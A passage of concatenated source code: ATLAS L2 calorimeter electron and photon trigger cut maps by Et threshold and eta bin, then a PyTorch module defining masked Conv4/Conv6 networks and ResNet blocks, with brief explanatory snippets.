# self.CARCOREthr = [0.532, 0.57, 0.646, 0.684, -9999., 0.722, 0.684, 0.722, -9999.]
##########################
# e5_medium1
#self.HADETthr = [0.1638, 0.1596, 0.1218, 0.1638, 0.0448875, 0.1386, 0.1596, 0.1638, 0.147]
#self.CARCOREthr = [0.532, 0.57, 0.646, 0.684, 0.418, 0.722, 0.684, 0.722, 0.70]
#self.CAERATIOthr = [0.57, 0.532, 0.342, 0.228, -9999., 0.304, 0.608, 0.722, -9999.]
# e5_tight1
# self.HADETthr = [0.1638, 0.1596, 0.1218, 0.1638, 0.0448875, 0.1386, 0.1596, 0.1638, 0.147]
# self.CARCOREthr = [0.532, 0.57, 0.646, 0.684, 0.418, 0.722, 0.684, 0.722, 0.70]
# self.CAERATIOthr = [0.57, 0.532, 0.342, 0.228, -9999., 0.304, 0.608, 0.722, -9999.]
##########################
if(float(threshold) < 12):
self.MapsHADETthr = {
'vloose': [0.2337, 0.20976, 0.1392, 0.1872, 0.1315, 0.3234, 0.384, 0.1901, 0.1901],
'loose': [0.2337, 0.2097, 0.1392, 0.1872, 0.1255, 0.3234, 0.3840, 0.1901, 0.1901],
'lhvloose': [0.2337, 0.20976, 0.1392, 0.1872, 0.1315, 0.3234, 0.384, 0.1901, 0.1901],
'lhloose': [0.2337, 0.2097, 0.1392, 0.1872, 0.1255, 0.3234, 0.3840, 0.1901, 0.1901],
'medium': [0.1872, 0.1824, 0.1392, 0.1872, 0.08196 ,0.2497, 0.384, 0.19008, 0.19008],
'lhmedium': [0.1872, 0.1824, 0.1392, 0.1872, 0.08196 ,0.2497, 0.384, 0.19008, 0.19008],
'tight': [0.1872, 0.1824, 0.1392, 0.1872, 0.06864, 0.24972, 0.31368, 0.1872, 0.168],
'lhtight': [0.1872, 0.1824, 0.1392, 0.1872, 0.06864, 0.24972, 0.31368, 0.1872, 0.168],
'mergedtight': [0.1872, 0.1824, 0.1392, 0.1872, 0.06864, 0.24972, 0.31368, 0.1872, 0.168],
}
self.MapsCAERATIOthr = {
'vloose': [0.48, 0.448, 0.1295, 0.0137, -9999. ,0.0122, 0.512, 0.6073, -9999],
'loose': [0.48, 0.448, 0.1295, 0.0137, -9999., 0.0122, 0.512, 0.6073, -9999],
'lhvloose': [0.48, 0.448, 0.1295, 0.0137, -9999. ,0.0122, 0.512, 0.6073, -9999],
'lhloose': [0.48, 0.448, 0.1295, 0.0137, -9999., 0.0122, 0.512, 0.6073, -9999],
'medium': [0.48, 0.448, 0.288, 0.192, -9999., 0.0176, 0.512, 0.608, -9999.],
'lhmedium': [0.48, 0.448, 0.288, 0.192, -9999., 0.0176, 0.512, 0.608, -9999.],
'tight': [0.48, 0.448, 0.288, 0.192, -9999., 0.256, 0.512, 0.608, -9999.],
'lhtight': [0.48, 0.448, 0.288, 0.192, -9999., 0.256, 0.512, 0.608, -9999.],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
self.MapsCARCOREthr = {
'vloose': [0.448, 0.48, 0.5414, 0.576, 0.352, 0.608, 0.576, 0.608, 0.55],
'loose': [0.6806, 0.6710, 0.6306, 0.6619, 0.4704, 0.7094, 0.7012, 0.6977, 0.6960],
'lhvloose': [0.448, 0.48, 0.5414, 0.576, 0.352, 0.608, 0.576, 0.608, 0.55],
'lhloose': [0.6806, 0.6710, 0.6306, 0.6619, 0.4704, 0.7094, 0.7012, 0.6977, 0.6960],
'medium': [0.448, 0.48, 0.544, 0.576, 0.352, 0.608, 0.576, 0.608, 0.598],
'lhmedium': [0.448, 0.48, 0.544, 0.576, 0.352, 0.608, 0.576, 0.608, 0.598],
'tight': [0.448, 0.48, 0.544, 0.576, 0.352, 0.608, 0.576, 0.608, 0.598],
'lhtight': [0.448, 0.48, 0.544, 0.576, 0.352, 0.608, 0.576, 0.608, 0.598],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
##########################
# Et 12 GeV
##########################
# e12_loose1
#AT 30-March-2012 Optimisation by Yanping:
#self.HADETthr = [0.04225, 0.04075, 0.04575, 0.03575, 0.05275, 0.05325, 0.05525, 0.05325, 0.04675]
#self.CARCOREthr = [0.8275, 0.8225, 0.7975, 0.8275, -9999., 0.8075, 0.8475, 0.8475, -9999.]
#self.CAERATIOthr = [0.775269, 0.735433, 0.574831, 0.513675, -9999., 0.584799, 0.776095, 0.822032, -9999.]
#AT: this optimisation could be well propagated to all loose1 triggers with ET>12 GeV if we need to cut L2 rate further
# e12_medium1
#self.HADETthr = [0.04225, 0.04075, 0.04575, 0.03575, 0.05275, 0.05325, 0.05525, 0.05325, 0.04675]
#self.CARCOREthr = [0.8275, 0.8225, 0.7975, 0.8275, -9999., 0.8075, 0.8475, 0.8475, -9999.]
#self.CAERATIOthr = [0.775269, 0.735433, 0.574831, 0.513675, -9999., 0.584799, 0.776095, 0.822032, -9999.]
# e12_tight
# self.HADETthr = [0.043, 0.043, 0.043, 0.043, 0.043, 0.043, 0.043, 0.043, 0.043]
# self.CARCOREthr = [0.90, 0.89, 0.89, 0.89, 0.90, 0.89, 0.89, 0.89, 0.89]
# self.CAERATIOthr = [0.60, 0.70, 0.70, 0.75, 0.85, 0.90, 0.90, 0.90, 0.90]
if(float(threshold) >= 12. and float(threshold) < 22):
self.MapsHADETthr = {
'vloose': [0.0871, 0.0617, 0.0564, 0.0827, 0.0889, 0.2052, 0.1674, 0.1481, 0.1481],
'loose': [0.08472, 0.05928, 0.054, 0.0803, 0.0829, 0.1932, 0.1590, 0.1384 , 0.1384],
'lhvloose': [0.0871, 0.0617, 0.0564, 0.0827, 0.0889, 0.2052, 0.1674, 0.1481, 0.1481],
'lhloose': [0.08472, 0.05928, 0.054, 0.0803, 0.0829, 0.1932, 0.1590, 0.1384 , 0.1384],
'medium': [0.0588, 0.0564, 0.054, 0.048, 0.06384, 0.17868, 0.1284, 0.07536, 0.07536],
'lhmedium': [0.0588, 0.0564, 0.054, 0.048, 0.06384, 0.17868, 0.1284, 0.07536, 0.07536],
'tight': [0.0588, 0.0564, 0.054, 0.048, 0.04368, 0.15612, 0.11064, 0.07536, 0.07536],
'lhtight': [0.0588, 0.0564, 0.054, 0.048, 0.04368, 0.15612, 0.11064, 0.07536, 0.07536],
'mergedtight': [0.0588, 0.0564, 0.054, 0.048, 0.04368, 0.15612, 0.11064, 0.07536, 0.07536],
}
self.MapsCARCOREthr = {
'vloose': [0.6646, 0.6590, 0.6226, 0.6539, 0.4704, 0.6536, 0.6972, 0.6817, 0.672],
'loose': [0.6806, 0.6710, 0.6306, 0.6619, 0.4704, 0.6616, 0.7012, 0.6977, 0.696],
'lhvloose': [0.6646, 0.6590, 0.6226, 0.6539, 0.4704, 0.6536, 0.6972, 0.6817, 0.672],
'lhloose': [0.6806, 0.6710, 0.6306, 0.6619, 0.4704, 0.6616, 0.7012, 0.6977, 0.696],
'medium': [0.69896, 0.68416, 0.64368, 0.68488, 0.4704, 0.6816, 0.704, 0.6992, 0.6992],
'lhmedium': [0.69896, 0.68416, 0.64368, 0.68488, 0.4704, 0.6816, 0.704, 0.6992, 0.6992],
'tight': [0.71296, 0.69344, 0.64368, 0.69064, 0.4704, 0.7036, 0.73024, 0.7164, 0.7164],
'lhtight': [0.71296, 0.69344, 0.64368, 0.69064, 0.4704, 0.7036, 0.73024, 0.7164, 0.7164],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
self.MapsCAERATIOthr = {
'vloose': [0.5702, 0.6063, 0.4418, 0.4257, -9999. , 0.3408, 0.5836, 0.6800, -999],
'loose': [0.5702, 0.6063, 0.4418, 0.4257, -9999., 0.3408, 0.5836, 0.6800, -999],
'lhvloose': [0.5702, 0.6063, 0.4418, 0.4257, -9999. , 0.3408, 0.5836, 0.6800, -999],
'lhloose': [0.5702, 0.6063, 0.4418, 0.4257, -9999., 0.3408, 0.5836, 0.6800, -999],
'medium': [0.636, 0.6064, 0.5552, 0.476, -9999., 0.5536, 0.664, 0.68 , -9999.],
'lhmedium': [0.636, 0.6064, 0.5552, 0.476, -9999., 0.5536, 0.664, 0.68 , -9999.],
'tight': [0.636, 0.652, 0.5552, 0.4768, -9999., 0.6056, 0.6696, 0.7128, -9999.],
'lhtight': [0.636, 0.652, 0.5552, 0.4768, -9999., 0.6056, 0.6696, 0.7128, -9999.],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
##########################
# Et 22 GeV
##########################
# e24_medium1 / e24_tight1
# AT 30-March-2012 Optimisation by Yanping:
# self.HADETthr = [0.0256693, 0.0240023, 0.0271098, 0.0206744, 0.0211902, 0.0301758, 0.0297629, 0.0295336, 0.020514]
# self.CARCOREthr = [0.882167, 0.882156, 0.857124, 0.886262, 0.724005, 0.871725, 0.902082, 0.887027, 0.744103]
# self.CAERATIOthr = [0.83009, 0.830144, 0.794944, 0.794558, -9999, 0.794933, 0.895365, 0.904011, -9999.]
# e24_loose1
# self.CAERATIOthr = [-999., -999., -999., -999., -999., -999., -999., -999., -999.]
# self.HADETthr = [0.0275625, 0.0259875, 0.0291375, 0.0228375, 0.0259875, 0.0391125, 0.0359625, 0.0370125, 0.0291375]
# self.CARCOREthr = [0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625]
if(float(threshold) >= 22.):
self.MapsHADETthr = {
'vloose': [0.0612, 0.0588, 0.0564, 0.0504, 0.0357, 0.072, 0.0684, 0.0696, 0.0636],
'loose': [0.0588, 0.0564, 0.054, 0.048, 0.0297, 0.06, 0.06, 0.06, 0.054],
'lhvloose': [0.0612, 0.0588, 0.0564, 0.0504, 0.0357, 0.072, 0.0684, 0.0696, 0.0636],
'lhloose': [0.0588, 0.0564, 0.054, 0.048, 0.0297, 0.06, 0.06, 0.06, 0.054],
'medium': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
'lhmedium': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
'tight': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
'lhtight': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
'mergedtight': [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054],
}
self.MapsCARCOREthr = {
'vloose': [0.6912 , 0.6808 , 0.6832 , 0.6744 , 0.5976 , 0.6416, 0.692 , 0.6848 , 0.68],
'loose': [0.7112, 0.6968, 0.6952, 0.6864, 0.5976, 0.6616, 0.704 , 0.7008, 0.696],
'lhvloose': [0.6912 , 0.6808 , 0.6832 , 0.6744 , 0.5976 , 0.6416, 0.692 , 0.6848 , 0.68],
'lhloose': [0.7112, 0.6968, 0.6952, 0.6864, 0.5976, 0.6616, 0.704 , 0.7008, 0.696],
'medium': [0.716, 0.712, 0.6952, 0.692, 0.5976, 0.6816, 0.7168, 0.7128, 0.716],
'lhmedium': [0.716, 0.712, 0.6952, 0.692, 0.5976, 0.6816, 0.7168, 0.7128, 0.716],
'tight': [0.7288, 0.7296, 0.72, 0.7048, 0.6, 0.7128, 0.7312, 0.7256, 0.7192],
'lhtight': [0.7288, 0.7296, 0.72, 0.7048, 0.6, 0.7128, 0.7312, 0.7256, 0.7192],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
self.MapsCAERATIOthr = {
'vloose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'lhvloose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'lhloose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium': [0.656, 0.66, 0.6, 0.604, -9999., 0.624, 0.664, 0.692, -9999.],
'lhmedium': [0.656, 0.66, 0.6, 0.604, -9999., 0.624, 0.664, 0.692, -9999.],
'tight': [0.72, 0.712, 0.68, 0.672, -9999., 0.68, 0.716, 0.74, -9999.],
'lhtight': [0.72, 0.712, 0.68, 0.672, -9999., 0.68, 0.716, 0.74, -9999.],
'mergedtight': [-9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999., -9999.],
}
# The photon cut maps below are simpler: within each Et range the
# loose/medium/tight working points share almost identical cuts.
class L2CaloPhotonCutMaps(object):
def __init__(self, threshold):
if(float(threshold) >= 0. and float(threshold) < 10):
self.MapsHADETthr = {
'loose': [0.1638, 0.1596, 0.1218, 0.1638, 0.0448875, 0.1386, 0.1596, 0.1638, 0.147],
'medium':[0.0254625, 0.0238875, 0.0270375, 0.0207375, 0.03465, 0.0378, 0.03465, 0.0286125, 0.02625],
'tight':[0.0254625, 0.0238875, 0.0270375, 0.0207375, 0.03465, 0.0378, 0.03465, 0.0286125, 0.02625],
}
self.MapsCARCOREthr = {
'loose': [0.532, 0.57, 0.646, 0.684, 0.418, 0.722, 0.684, 0.722, 0.76],
'medium':[0.83125, 0.719625, 0.814625, 0.83125, 0.703, 0.817, 0.83125, 0.8265, 0.719625],
'tight':[0.83125, 0.719625, 0.814625, 0.83125, 0.703, 0.817, 0.83125, 0.8265, 0.719625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 10. and float(threshold) < 15):
self.MapsHADETthr = {
'loose': [0.0359625, 0.0343875, 0.0396375, 0.0291375, 0.0501375, 0.0559125, 0.0548625, 0.0538125, 0.0469875],
'medium':[0.0359625, 0.0343875, 0.0396375, 0.0291375, 0.0501375, 0.0559125, 0.0548625, 0.0538125, 0.0469875],
'tight':[0.0359625, 0.0343875, 0.0396375, 0.0291375, 0.0501375, 0.0559125, 0.0548625, 0.0538125, 0.0469875],
}
self.MapsCARCOREthr = {
'loose': [0.786125, 0.786125, 0.767125, 0.795625, 0.703, 0.776625, 0.819375, 0.805125, 0.681625],
'medium':[0.786125, 0.786125, 0.767125, 0.795625, 0.703, 0.776625, 0.819375, 0.805125, 0.681625],
'tight':[0.786125, 0.786125, 0.767125, 0.795625, 0.703, 0.776625, 0.819375, 0.805125, 0.681625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 15. and float(threshold) < 20):
self.MapsHADETthr = {
'loose':[0.0328125, 0.0312375, 0.0354375, 0.0270375, 0.0459375, 0.0527625, 0.0433125, 0.0485625, 0.0396375],
'medium':[0.0328125, 0.0312375, 0.0354375, 0.0270375, 0.0459375, 0.0527625, 0.0433125, 0.0485625, 0.0396375],
'tight':[0.0328125, 0.0312375, 0.0354375, 0.0270375, 0.0459375, 0.0527625, 0.0433125, 0.0485625, 0.0396375],
}
self.MapsCARCOREthr = {
'loose':[0.809875, 0.805125, 0.786125, 0.809875, 0.703, 0.795625, 0.819375, 0.814625, 0.691125],
'medium':[0.809875, 0.805125, 0.786125, 0.809875, 0.703, 0.795625, 0.819375, 0.814625, 0.691125],
'tight':[0.809875, 0.805125, 0.786125, 0.809875, 0.703, 0.795625, 0.819375, 0.814625, 0.691125],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 20. and float(threshold) < 30):
self.MapsHADETthr = {
'loose':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'medium':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'tight':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
}
self.MapsCARCOREthr = {
'loose':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'medium':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'tight':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 30. and float(threshold) < 40):
self.MapsHADETthr = {
'loose':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'medium':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'tight':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
}
self.MapsCARCOREthr = {
'loose':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'medium':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'tight':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium':[-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
elif(float(threshold) >= 40.):
self.MapsHADETthr = {
'loose':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'medium':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
'tight':[0.071, 0.062, 0.075, 0.060, 0.051, 0.057, 0.075, 0.072, 0.051],
}
self.MapsCARCOREthr = {
'loose':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'medium':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
'tight':[0.819375, 0.819375, 0.800375, 0.828875, 0.7125, 0.805125, 0.843125, 0.824125, 0.700625],
}
self.MapsCAERATIOthr = {
'loose': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'medium': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
'tight': [-999., -999., -999., -999., -999., -999., -999., -999., -999.],
}
else:
raise RuntimeError('INCORRECT threshold: No cuts configured')
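Each nine-entry list above holds one threshold per |eta| bin. The bin edges are not stated in this file, so the values below are an assumption (the standard ATLAS egamma |eta| binning); HADET (hadronic leakage) is treated as an upper cut, which is how such thresholds are typically applied:

```python
import bisect

# Assumed ATLAS |eta| bin edges (9 bins) -- not defined in this module.
ETA_BINS = [0.0, 0.6, 0.8, 1.15, 1.37, 1.52, 1.81, 2.01, 2.37, 2.47]

def eta_bin(eta):
    """Map |eta| to one of the 9 cut-list indices, clamping out-of-range values."""
    idx = bisect.bisect_right(ETA_BINS, abs(eta)) - 1
    return min(max(idx, 0), len(ETA_BINS) - 2)

def passes_hadet(hadet, eta, thresholds):
    """Hadronic leakage is an upper cut: pass if below the binned threshold."""
    return hadet < thresholds[eta_bin(eta)]

# 'tight' HADET thresholds from the Et >= 22 GeV electron map above
tight_22 = [0.0588, 0.0564, 0.054, 0.048, 0.02376, 0.06, 0.06, 0.06, 0.054]
ok = passes_hadet(0.03, 0.5, tight_22)
```

The RCore and Eratio maps would be applied the same way but as lower cuts (pass if above threshold), with the `-999.`/`-9999.` entries acting as "no cut" sentinels.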
# File: models/masked_convs.py (repo: VITA-Group/Peek-a-Boo, license: MIT)
'''Masked convolutional networks (Conv4/Conv6) in PyTorch.
Adapted from a ResNet implementation; for Pre-activation ResNet, see 'preact_resnet.py'.
Reference:
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Deep Residual Learning for Image Recognition. arXiv:1512.03385
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import numpy as np
from masked_layers import layers
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return layers.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return layers.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
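`conv3x3` sets `padding=dilation`, which preserves spatial size at stride 1, and each `MaxPool2d((2, 2))` then halves it. A quick sketch of the standard output-size formula (per the PyTorch `Conv2d` docs) that can be used to check the `256 * 4 * 4` flatten in `Conv6`:

```python
def conv_out_size(n, k, stride=1, padding=0, dilation=1):
    """Output spatial size of a conv/pool layer with square kernels."""
    return (n + 2 * padding - dilation * (k - 1) - 1) // stride + 1

same = conv_out_size(32, 3, stride=1, padding=1)   # conv3x3 keeps 32x32
pooled = conv_out_size(32, 2, stride=2)            # one MaxPool2d((2, 2))
```

Three pools take a 32x32 CIFAR input to 4x4, so `Conv6`'s final feature map is 256 channels at 4x4, matching the `conv1x1(256 * 4 * 4, 256)` head.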
class Conv4(nn.Module):
def __init__(self, num_classes=10, init_method='standard'):
super(Conv4, self).__init__()
self.convs = nn.Sequential(
conv3x3(3, 64),
nn.BatchNorm2d(64),
nn.ReLU(),
conv3x3(64, 64),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
conv3x3(64, 128),
nn.BatchNorm2d(128),
nn.ReLU(),
conv3x3(128, 128),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.MaxPool2d((2, 2))
)
self.linear = nn.Sequential(
conv1x1(128 * 8 * 8, 256),  # 128 channels at 8x8 after two 2x2 pools (= 8192)
nn.BatchNorm2d(256),
nn.ReLU(),
conv1x1(256, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
conv1x1(256, num_classes),
)
self.reset_conv_parameters(init_method)
for m in self.modules():
if isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def reset_parameters(self, module, init_method="kaiming_uniform") -> None:
if init_method == "kaiming_constant_signed":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "kaiming_constant_unsigned":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = torch.ones_like(module.weight.data) * std
elif init_method == "kaiming_normal":
nn.init.kaiming_normal_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_uniform":
nn.init.kaiming_uniform_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_laplace":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
scale = gain / math.sqrt(2.0 * fan)
with torch.no_grad():
new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)
module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())
elif init_method == "xavier_normal":
nn.init.xavier_normal_(module.weight)
elif init_method == "xavier_constant":
fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)
std = math.sqrt(2.0 / float(fan_in + fan_out))
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "standard":
nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))
else:
raise ValueError(f"{init_method} is not an initialization option!")
def reset_conv_parameters(self, init_method="standard") -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
self.reset_parameters(m, init_method)
def get_bop_params(self):
bop_params = []
for m in self.modules():
if isinstance(m, nn.Conv2d):
bop_params += list(m.parameters())
return bop_params
def get_bop_param_masks(self):
bop_param_masks = []
for m in self.modules():
if isinstance(m, layers.Conv2d):
bop_param_masks.append(m.weight_mask)
return bop_param_masks
def get_non_bop_params(self):
non_bop_params = []
for m in self.modules():
if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):
non_bop_params += list(m.parameters())
return non_bop_params
def forward(self, x):
out = self.convs(x)
out = out.view(out.size(0), 8192, 1, 1)
out = self.linear(out)
return out.squeeze()
class Conv6(nn.Module):
def __init__(self, num_classes=10, init_method='standard'):
super(Conv6, self).__init__()
self.convs = nn.Sequential(
conv3x3(3, 64),
nn.BatchNorm2d(64),
nn.ReLU(),
conv3x3(64, 64),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
conv3x3(64, 128),
nn.BatchNorm2d(128),
nn.ReLU(),
conv3x3(128, 128),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
conv3x3(128, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
conv3x3(256, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.MaxPool2d((2, 2))
)
self.linear = nn.Sequential(
conv1x1(256 * 4 * 4, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
conv1x1(256, 256),
nn.BatchNorm2d(256),
nn.ReLU(),
conv1x1(256, num_classes),
)
self.reset_conv_parameters(init_method)
for m in self.modules():
if isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def reset_parameters(self, module, init_method="kaiming_uniform") -> None:
if init_method == "kaiming_constant_signed":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "kaiming_constant_unsigned":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = torch.ones_like(module.weight.data) * std
elif init_method == "kaiming_normal":
nn.init.kaiming_normal_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_uniform":
nn.init.kaiming_uniform_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_laplace":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
scale = gain / math.sqrt(2.0 * fan)
with torch.no_grad():
new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)
module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())
elif init_method == "xavier_normal":
nn.init.xavier_normal_(module.weight)
elif init_method == "xavier_constant":
fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)
std = math.sqrt(2.0 / float(fan_in + fan_out))
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "standard":
nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))
else:
raise ValueError(f"{init_method} is not an initialization option!")
def reset_conv_parameters(self, init_method="standard") -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
self.reset_parameters(m, init_method)
def get_bop_params(self):
bop_params = []
for m in self.modules():
if isinstance(m, nn.Conv2d):
bop_params += list(m.parameters())
return bop_params
def get_bop_param_masks(self):
bop_param_masks = []
for m in self.modules():
if isinstance(m, layers.Conv2d):
bop_param_masks.append(m.weight_mask)
return bop_param_masks
def get_non_bop_params(self):
non_bop_params = []
for m in self.modules():
if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):
non_bop_params += list(m.parameters())
return non_bop_params
def forward(self, x):
out = self.convs(x)
out = out.view(out.size(0), 256 * 4 * 4, 1, 1)
out = self.linear(out)
return out.squeeze()
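The `view` in `Conv6.forward` reshapes the pooled features to `(N, 256 * 4 * 4, 1, 1)` so the 1x1-conv head can act as a fully connected classifier. A minimal sketch of where that dimension comes from, assuming a 32x32 CIFAR-style input (an assumption; the model itself does not pin the input size, and `flatten_dim` is an illustrative helper, not part of the model code):

```python
# Each MaxPool2d((2, 2)) halves the spatial side, so after three pools a
# 32x32 input shrinks to 4x4 and the flattened feature size is C * H * W.
def flatten_dim(channels: int, spatial: int, n_pools: int) -> int:
    side = spatial // (2 ** n_pools)  # 32 -> 16 -> 8 -> 4
    return channels * side * side

print(flatten_dim(256, 32, 3))  # -> 4096, i.e. 256 * 4 * 4
```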
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.conv1 = conv3x3(in_planes, planes, stride=stride) #, padding=1)
self.bn1 = nn.BatchNorm2d(planes)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.conv2 = conv3x3(planes, planes, stride=1) #, padding=1)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
conv1x1(in_planes, self.expansion*planes, stride=stride),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
